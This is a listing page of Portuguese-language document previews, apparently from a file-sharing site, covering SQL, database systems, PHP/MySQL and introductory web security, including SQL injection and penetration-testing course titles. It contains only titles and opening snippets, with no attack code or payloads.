SGBDs Móveis. Sumário 12/06/11. Emmanuel Férrer & Gabriela Fernanda. Introdução. Desafios do armazenamento. SQL Anywhere Studio. SGBDs Móveis Emmanuel Férrer & Gabriela Fernanda Introdução Sumário Desafios do armazenamento SQL Anywhere Studio DB2 Everyplace Microsoft SQL Server Oracle9I Lite Aplicações Móveis Referências 1 Introdução

Leia mais

2008.1. A linguagem SQL

2008.1. A linguagem SQL SQL 2008.1 A linguagem SQL SQL - Structured Query Language. Foi definida nos laboratórios de pesquisa da IBM em San Jose, California, em 1974. Teve seus fundamentos no modelo relacional Sua primeira versão

Leia mais

SQL Server Triggers Aprenda a utilizar triggers em views e auditar as colunas atualizadas em uma tabela

SQL Server Triggers Aprenda a utilizar triggers em views e auditar as colunas atualizadas em uma tabela SQL Server Triggers Aprenda a utilizar triggers em views e auditar as colunas atualizadas em uma tabela Certamente você já ouviu falar muito sobre triggers. Mas o quê são triggers? Quando e como utilizá-las?

Leia mais

Gestão de Segurança da Informação. Segurança de Banco de Dados ( SQL Injection, APBIDS, Modelagem )

Gestão de Segurança da Informação. Segurança de Banco de Dados ( SQL Injection, APBIDS, Modelagem ) Segurança de Aplicações e Banco de Dados Gestão de Segurança da Informação pós-graduação Lato Sensu Segurança de Banco de Dados ( SQL Injection, APBIDS, Modelagem ) Patrick Tracanelli Francisco Temponi

Leia mais

Entendendo Injeção de SQL

Entendendo Injeção de SQL Entendendo Injeção de SQL Autor K4m1k451 < k4m1k451@gmail.com bere_bad@hotmail.com > 18/05/2009 Sumário: ---[ 0x00 Introdução... 4 ---[ 0x01 Desmistificando as single quotes... 4 ---[ 0x02 Injetando...

Leia mais

PHP e MySQL Autenticação de Usuários

PHP e MySQL Autenticação de Usuários PHP e MySQL Autenticação de Usuários Programação de Servidores Marx Gomes Van der Linden http://marx.vanderlinden.com.br/ Controle de Acesso A maioria das aplicações web envolve em algum ponto um mecanismo

Leia mais

Documento de Requisitos de Rede (DRP)

Documento de Requisitos de Rede (DRP) Documento de Requisitos de Rede (DRP) Versão 1.2 SysTrack - Grupo 1 1 Histórico de revisões do modelo Versão Data Autor Descrição 1.0 30/04/2011 João Ricardo Versão inicial 1.1 1/05/2011 André Ricardo

Leia mais

SQL Linguagem de Definição de Dados. Laboratório de Bases de Dados Profa. Dra. Cristina Dutra de Aguiar Ciferri

SQL Linguagem de Definição de Dados. Laboratório de Bases de Dados Profa. Dra. Cristina Dutra de Aguiar Ciferri SQL Linguagem de Definição de Dados SQL Structured Query Language Uma das mais importantes linguagens relacionais (se não a mais importante) Exemplos de SGBD que utilizam SQL Oracle Informix Ingress SQL

Leia mais

O que são Bancos de Dados?

O que são Bancos de Dados? SQL Básico Liojes de Oliveira Carneiro professor.liojes@gmail.com www.professor-liojes.blogspot.com O que são Bancos de Dados? É o software que armazena, organiza, controla, trata e distribui os dados

Leia mais

INTRODUÇÃO. No entanto, o que pode ser considerado um produto (resultado) da criação de BDs?

INTRODUÇÃO. No entanto, o que pode ser considerado um produto (resultado) da criação de BDs? BANCO DE DADOS Universidade do Estado de Santa Catarina Centro de Ciências Tecnológicas Departamento de Ciência da Computação Prof. Alexandre Veloso de Matos alexandre.matos@udesc.br INTRODUÇÃO Um Banco

Leia mais

trigger insert, delete, update

trigger insert, delete, update 1 Um trigger é um conjunto de instruções SQL armazenadas no catalogo da BD Pertence a um grupo de stored programs do MySQL Executado quando um evento associado com uma tabela acontece: insert, delete,

Leia mais

SIQ GQF Plugin s WEB (Aplicações WEB) Gestão da Qualidade de Fornecedores

SIQ GQF Plugin s WEB (Aplicações WEB) Gestão da Qualidade de Fornecedores SIQ GQF Plugin s WEB (Aplicações WEB) Gestão da Qualidade de Fornecedores Requerimentos do Software Versão para Microsoft Windows/Unix Dezembro 2006 Bem-Vindo ao to SIQ GQF Plugin s WEB - Gestão da Qualidade

Leia mais

Penetration Testing Workshop

Penetration Testing Workshop Penetration Testing Workshop Information Security FCUL 9 Maio 2013 Workshop FCUL Marco Vaz, CISSP, CISA, ISO27001LA, ITILv3 Expert Consultant Partner (mv@integrity.pt) Herman Duarte, OSCP, Associate CISSP,

Leia mais

Programando em PHP. Conceitos Básicos

Programando em PHP. Conceitos Básicos Programando em PHP www.guilhermepontes.eti.br lgapontes@gmail.com Conceitos Básicos Todo o escopo deste estudo estará voltado para a criação de sites com o uso dos diversos recursos de programação web

Leia mais

PHP INTEGRAÇÃO COM MYSQL PARTE 1

PHP INTEGRAÇÃO COM MYSQL PARTE 1 INTRODUÇÃO PHP INTEGRAÇÃO COM MYSQL PARTE 1 Leonardo Pereira leonardo@estudandoti.com.br Facebook: leongamerti http://www.estudandoti.com.br Informações que precisam ser manipuladas com mais segurança

Leia mais

Segurança no Desenvolvimento de Aplicações Web. Security in Web Applications Development

Segurança no Desenvolvimento de Aplicações Web. Security in Web Applications Development Segurança no Desenvolvimento de Aplicações Web Security in Web Applications Development Jonas Alves de Oliveira 1 Leonardo Luiz Teodoro Campos 2 Cristiano Antônio Rocha Silveira Diniz 3 Resumo: Este artigo

Leia mais

Segurança em Web Aula 1

Segurança em Web Aula 1 Open Web Application Security Project Segurança em Web Aula 1 Maycon Maia Vitali ( 0ut0fBound ) maycon@hacknroll.com Hack n Roll Centro Universitário Vila Velha Agenda Sobre o Instrutor Objetivos do Curso

Leia mais

SuporteNativoa XML no

SuporteNativoa XML no SuporteNativoa XML no Gerenciamento de Dados e Informação Suporte Nativo a XML no Oracle Fernando Fonseca Ana Carolina Robson Fidalgo 2 Oracle & XML Habilita uma fonte confiável para XML Apresenta flexibilidade

Leia mais

Prof. Omero, pág. 63. Banco de Dados InterBase.

Prof. Omero, pág. 63. Banco de Dados InterBase. Prof. Omero, pág. 63 O que é o InterBase? O InterBase é um SGBDR - Sistema Gerenciador de Banco de Dados Cliente/Servidor Relacional 1 que está baseado no padrão SQL ANSI-9, de alta performance, independente

Leia mais

Tecnologias WEB Web 2.0

Tecnologias WEB Web 2.0 Tecnologias WEB Web 2.0 Prof. José Maurício S. Pinheiro UniFOA 2009-2 Conceitos A Web 2.0 marca uma tendência que reforça o conceito de troca de informações e colaboração entre seres humanos, sites e serviços

Leia mais

Programação SQL. Introdução

Programação SQL. Introdução Introdução Principais estruturas duma Base de Dados: Uma BD relacional é constituída por diversas estruturas (ou objectos ) de informação. Podemos destacar: Database: designa a própria BD; Table/Tabela:

Leia mais

Tolerância a Falhas em sistemas distribuídos (programação)

Tolerância a Falhas em sistemas distribuídos (programação) Tolerância a Falhas em sistemas distribuídos (programação) Arthur Zavattieri Cano Lopes Curso de Redes e Segurança de Sistemas Pontifícia Universidade Católica do Paraná Curitiba, Maio de 2009. Resumo

Leia mais

Andarta - Guia de Instalação. Guia de Instalação

Andarta - Guia de Instalação. Guia de Instalação Guia de Instalação 29 de setembro de 2010 1 Sumário Introdução... 3 Os Módulos do Andarta... 4 Instalação por módulo... 6 Módulo Andarta Server... 6 Módulo Reporter... 8 Módulo Agent... 9 Instalação individual...

Leia mais

FileMaker 13. Guia de ODBC e JDBC

FileMaker 13. Guia de ODBC e JDBC FileMaker 13 Guia de ODBC e JDBC 2004 2013 FileMaker Inc. Todos os direitos reservados. FileMaker Inc. 5201 Patrick Henry Drive Santa Clara, Califórnia 95054 FileMaker e Bento são marcas comerciais da

Leia mais

Esta aula tem o objetivo de nos orientar durante este período em nossas aulas de Banco de Dados, não tem a pretensão de ser a única fonte de

Esta aula tem o objetivo de nos orientar durante este período em nossas aulas de Banco de Dados, não tem a pretensão de ser a única fonte de BD Esta aula tem o objetivo de nos orientar durante este período em nossas aulas de Banco de Dados, não tem a pretensão de ser a única fonte de informação para nosso êxito no curso. A intenção de elaborar

Leia mais

Trabalhando com conexão ao banco de dados MySQL no Lazarus. Prof. Vitor H. Migoto de Gouvêa Colégio IDESA 2011

Trabalhando com conexão ao banco de dados MySQL no Lazarus. Prof. Vitor H. Migoto de Gouvêa Colégio IDESA 2011 Trabalhando com conexão ao banco de dados MySQL no Lazarus Prof. Vitor H. Migoto de Gouvêa Colégio IDESA 2011 Edição 4 O Componente Trabalhando com conexão ao banco de dados MySQL no Lazarus Ano: 03/2011

Leia mais

Módulo 6: Linguagem de Programação IV 6.1. Introdução 6.2. Bases de Dados 6.2.1. Visão Estrutural 6.2.2. SGBD: Sistema de Gestão de Bases de Dados

Módulo 6: Linguagem de Programação IV 6.1. Introdução 6.2. Bases de Dados 6.2.1. Visão Estrutural 6.2.2. SGBD: Sistema de Gestão de Bases de Dados Curso Profissional de Técnico de Multimédia 12ºAno Disciplina: Sistemas de Informação Módulo 6: Linguagem de Programação IV 6.1. Introdução 6.2. Bases de Dados 6.2.1. Visão Estrutural 6.2.2. SGBD: Sistema

Leia mais

BANCO DE DADOS: SQL. Edson Anibal de Macedo Reis Batista. 27 de janeiro de 2010

BANCO DE DADOS: SQL. Edson Anibal de Macedo Reis Batista. 27 de janeiro de 2010 BANCO DE DADOS: SQL UERN - Universidade do Estado do Rio Grande do Norte. Departamento de Ciências da Computação. 27 de janeiro de 2010 índice 1 Introdução 2 3 Introdução SQL - Structured Query Language

Leia mais

Manual STCP Web Admin 27/07/2009, Riversoft Integração e Desenvolvimento

Manual STCP Web Admin 27/07/2009, Riversoft Integração e Desenvolvimento STCP OFTP Web Admin Versão 4.0.0 Riversoft Integração e Desenvolvimento de Software Ltda Av.Dr.Delfim Moreira, 537 Centro Santa Rita do Sapucaí, Minas Gerais CEP 37540 000 Tel/Fax: 35 3471 0282 E-mail:

Leia mais

SQL Injection Amplifying Data Leakage OWASP. The OWASP Foundation http://www.owasp.org. Ulisses Castro Security Researcher uss.castro@gmail.

SQL Injection Amplifying Data Leakage OWASP. The OWASP Foundation http://www.owasp.org. Ulisses Castro Security Researcher uss.castro@gmail. SQL Injection Amplifying Data Leakage Ulisses Castro Security Researcher uss.castro@gmail.com Copyright 2007 The Foundation Permission is granted to copy, distribute and/or modify this document under the

Leia mais

As doze maiores ameaças do mercado intermediário: evitando ataques maliciosos comuns em nível de aplicativo.

As doze maiores ameaças do mercado intermediário: evitando ataques maliciosos comuns em nível de aplicativo. Gerenciamento de segurança on-line White paper Dezembro de 2007 As doze maiores ameaças do mercado intermediário: evitando ataques maliciosos comuns Página 2 Conteúdo 2 Introdução 3 Compreendendo ataques

Leia mais

Programação Web Prof. Wladimir

Programação Web Prof. Wladimir Programação Web Prof. Wladimir Linguagem de Script e PHP @wre2008 1 Sumário Introdução; PHP: Introdução. Enviando dados para o servidor HTTP; PHP: Instalação; Formato básico de um programa PHP; Manipulação

Leia mais

Associação Carioca de Ensino Superior Centro Universitário Carioca

Associação Carioca de Ensino Superior Centro Universitário Carioca Desenvolvimento de Aplicações Web Lista de Exercícios Métodos HTTP 1. No tocante ao protocolo de transferência de hipertexto (HTTP), esse protocolo da categoria "solicitação e resposta" possui três métodos

Leia mais

3. ( ) Para evitar a contaminação de um arquivo por vírus, é suficiente salvá-lo com a opção de compactação.

3. ( ) Para evitar a contaminação de um arquivo por vírus, é suficiente salvá-lo com a opção de compactação. 1. Com relação a segurança da informação, assinale a opção correta. a) O princípio da privacidade diz respeito à garantia de que um agente não consiga negar falsamente um ato ou documento de sua autoria.

Leia mais

BANCO DE DADOS. info 3º ano. Prof. Diemesleno Souza Carvalho diemesleno@iftm.edu.br www.diemesleno.com.br

BANCO DE DADOS. info 3º ano. Prof. Diemesleno Souza Carvalho diemesleno@iftm.edu.br www.diemesleno.com.br BANCO DE DADOS info 3º ano Prof. Diemesleno Souza Carvalho diemesleno@iftm.edu.br www.diemesleno.com.br Na última aula estudamos Unidade 4 - Projeto Lógico Normalização; Dicionário de Dados. Arquitetura

Leia mais

UNIVERSIDADE VEIGA DE ALMEIDA CURSO DE BACHARELADO EM CIÊNCIA DA COMPUTAÇÃO CURSO SUPERIOR DE TECNOLOGIA EM PROCESSAMENTO DE DADOS BANCO DE DADOS

UNIVERSIDADE VEIGA DE ALMEIDA CURSO DE BACHARELADO EM CIÊNCIA DA COMPUTAÇÃO CURSO SUPERIOR DE TECNOLOGIA EM PROCESSAMENTO DE DADOS BANCO DE DADOS CURSO DE BACHARELADO EM CIÊNCIA DA COMPUTAÇÃO CURSO SUPERIOR DE TECNOLOGIA EM PROCESSAMENTO DE DADOS CLAUDIO RIBEIRO DA SILVA MARÇO 1997 2 1 - CONCEITOS GERAIS DE 1.1 - Conceitos Banco de Dados - Representa

Leia mais

Prof. Carlos Majer Aplicações Corporativas UNICID

Prof. Carlos Majer Aplicações Corporativas UNICID Este material pertence a Carlos A. Majer, Professor da Unidade Curricular: Aplicações Corporativas da Universidade Cidade de São Paulo UNICID Licença de Uso Este trabalho está licenciado sob uma Licença

Leia mais

SQL Linguagem de Definição de Dados. Banco de Dados Profa. Dra. Cristina Dutra de Aguiar Ciferri

SQL Linguagem de Definição de Dados. Banco de Dados Profa. Dra. Cristina Dutra de Aguiar Ciferri SQL Linguagem de Definição de Dados Banco de Dados SQL Structured Query Language Uma das mais importantes linguagens relacionais (se não a mais importante) Exemplos de SGBD que utilizam SQL Oracle Informix

Leia mais

INICIAL. Guia de Criação da Base Produção Paralela IMPORTANTE: MESMO QUE SEJAM EXECUTADOS

INICIAL. Guia de Criação da Base Produção Paralela IMPORTANTE: MESMO QUE SEJAM EXECUTADOS Guia de Criação da Base Produção Paralela INICIAL SEQUENCES, tabelas de BMF e CADASTRO. Atualização de Bancos de Dados. Validações necessárias. IMPORTANTE: MESMO QUE SEJAM EXECUTADOS OS PROCEDIMENTOS DA

Leia mais

Segurança em aplicações web: pequenas ideias, grandes resultados Prof. Alex Camargo alexcamargoweb@gmail.com

Segurança em aplicações web: pequenas ideias, grandes resultados Prof. Alex Camargo alexcamargoweb@gmail.com UNIVERSIDADE FEDERAL DO PAMPA CAMPUS BAGÉ ENGENHARIA DE COMPUTAÇÃO Segurança em aplicações web: pequenas ideias, grandes resultados alexcamargoweb@gmail.com Sobre o professor Formação acadêmica: Bacharel

Leia mais

Controle de acesso. http://www.larback.com.br. .com.br

Controle de acesso. http://www.larback.com.br. .com.br http://www.larback Controle de acesso Construiremos um sistema simples para cadastro de links. O sistema terá uma página pública (onde serão exibidos os links) e uma área administrativa, onde os usuários

Leia mais

Passos Preliminares: Acessando a máquina virtual via ssh.

Passos Preliminares: Acessando a máquina virtual via ssh. CIn/UFPE Sistemas de Informação Redes de Computadores Professor: Kelvin Lopes Dias Monitor: Edson Adriano Maravalho Avelar {kld,eama@cin.ufpe.br Instalando o APACHE, PHP (PHPADMIN), MySQL. Este tutorial

Leia mais

2008.1 SQL. Autor: Renata Viegas

2008.1 SQL. Autor: Renata Viegas SQL Autor: Renata Viegas A linguagem SQL SQL - Structured Query Language. Foi definida nos laboratórios de pesquisa da IBM em San Jose, California, em 1974. Teve seus fundamentos no modelo relacional Sua

Leia mais

Versão <1.0> Documento de Requisitos. Documento de Requisitos. Equipe:

Versão <1.0> Documento de Requisitos. Documento de Requisitos. Equipe: Versão Documento de Requisitos Documento de Requisitos Equipe: Bruno Harada (bhhc) Edilson Augusto Junior (easj) José Ivson Soares da Silva (jiss) Pedro Rodolfo da Silva Gonçalves (prsg) Raphael

Leia mais

Guia de Instalação do SARA Portal Web TOTVS [06/2015]

Guia de Instalação do SARA Portal Web TOTVS [06/2015] Guia de Instalação do SARA Portal Web TOTVS [06/2015] Sumário 1. Instalação do Portal WEB SARA... 3 2. Instalação do Protheus... 4 3. Atualização do Binário do Protheus... 5 4. Atualização do RPO... 6

Leia mais

Programação Orientada a Objetos com PHP & MySQL Cookies e Sessões. Prof. MSc. Hugo Souza

Programação Orientada a Objetos com PHP & MySQL Cookies e Sessões. Prof. MSc. Hugo Souza Programação Orientada a Objetos com PHP & MySQL Cookies e Sessões Prof. MSc. Hugo Souza Se você precisar manter informações sobre seus usuários enquanto eles navegam pelo seu site, ou até quando eles saem

Leia mais

Faculdade Pitágoras 16/08/2011. Curso Superior de Tecnologia: Banco de Dados Sistemas para Internet

Faculdade Pitágoras 16/08/2011. Curso Superior de Tecnologia: Banco de Dados Sistemas para Internet Faculdade Pitágoras Curso Superior de Tecnologia: Banco de Dados Sistemas para Internet Disciplina: Banco de Dados Prof.: Fernando Hadad Zaidan SQL A linguagem SQL é responsável por garantir um bom nível

Leia mais

Faculdade Pitágoras. Curso Superior de Tecnologia: Banco de Dados. Disciplina: Banco de Dados Prof.: Fernando Hadad Zaidan SQL

Faculdade Pitágoras. Curso Superior de Tecnologia: Banco de Dados. Disciplina: Banco de Dados Prof.: Fernando Hadad Zaidan SQL Faculdade Pitágoras Curso Superior de Tecnologia: Banco de Dados Disciplina: Banco de Dados Prof.: Fernando Hadad Zaidan SQL A linguagem SQL é responsável por garantir um bom nível de independência do

Leia mais

segurança em aplicações web

segurança em aplicações web segurança em aplicações web myke hamada mykesh gmail 1 whoami ciência da computação segurança da informação ruby rails c# vbscript opensource microsoft ethical hacking 2 agenda introdução ontem e

Leia mais

Curso Pentest Profissional

Curso Pentest Profissional Ementa Oficial do Curso Pentest Profissional Capítulo 01 Introdução Mercado de Segurança da Informação (Pentest) Preparação Entender o cliente Definir o escopo e limitações Janela de testes Contato Responsabilidades

Leia mais

Consumindo um Web Service através de uma Aplicação Comercial em Android. Alex Malmann Becker www.alex.porthal.com.br alex@porthal.com.

Consumindo um Web Service através de uma Aplicação Comercial em Android. Alex Malmann Becker www.alex.porthal.com.br alex@porthal.com. Consumindo um Web Service através de uma Aplicação Comercial em Android Alex Malmann Becker www.alex.porthal.com.br alex@porthal.com.br 08/2014 Agenda Introdução Conceitos Web Service Por que utilizar

Leia mais

Injeção de SQL - Detecção de evasão

Injeção de SQL - Detecção de evasão Injeção de SQL - Detecção de evasão Resumo A detecção dos ataques de injeção de SQL era feita inicialmente com o uso de técnicas de reconhecimento de padrões, verificados contra assinaturas e palavraschave

Leia mais

Pen-test de Aplicações Web: Técnicas e Ferramentas

Pen-test de Aplicações Web: Técnicas e Ferramentas Divisão de Informática - DINF MJ Departamento de Polícia Federal Pen-test de Aplicações Web: Técnicas e Ferramentas Ivo de Carvalho Peixinho Perito Criminal Federal Agenda 1. Introdução 2. Ferramentas

Leia mais

GBD. Introdução PROF. ANDREZA S. AREÃO

GBD. Introdução PROF. ANDREZA S. AREÃO GBD Introdução PROF. ANDREZA S. AREÃO Sistema de arquivos X Sistemas de Banco de Dados Sistema de arquivos Sistema de Banco de Dados Aplicativos Dados (arquivos) Aplicativos SGBD Dados (arquivos) O acesso/gerenciamento

Leia mais

FTP - Protocolo. O protocolo FTP é o serviço padrão da Internet para a transferência de arquivos entre computadores.

FTP - Protocolo. O protocolo FTP é o serviço padrão da Internet para a transferência de arquivos entre computadores. FTP FTP - Protocolo O protocolo FTP é o serviço padrão da Internet para a transferência de arquivos entre computadores. A partir do FTP usuários podem receber ou enviar arquivos de ou para outros computadores

Leia mais

Desenvolvendo para WEB

Desenvolvendo para WEB Nível - Básico Desenvolvendo para WEB Por: Evandro Silva Neste nosso primeiro artigo vamos revisar alguns conceitos que envolvem a programação de aplicativos WEB. A ideia aqui é explicarmos a arquitetura

Leia mais

TECNOLOGIA WEB. Segurança na Internet Aula 4. Profa. Rosemary Melo

TECNOLOGIA WEB. Segurança na Internet Aula 4. Profa. Rosemary Melo TECNOLOGIA WEB Segurança na Internet Aula 4 Profa. Rosemary Melo Segurança na Internet A evolução da internet veio acompanhada de problemas de relacionados a segurança. Exemplo de alguns casos de falta

Leia mais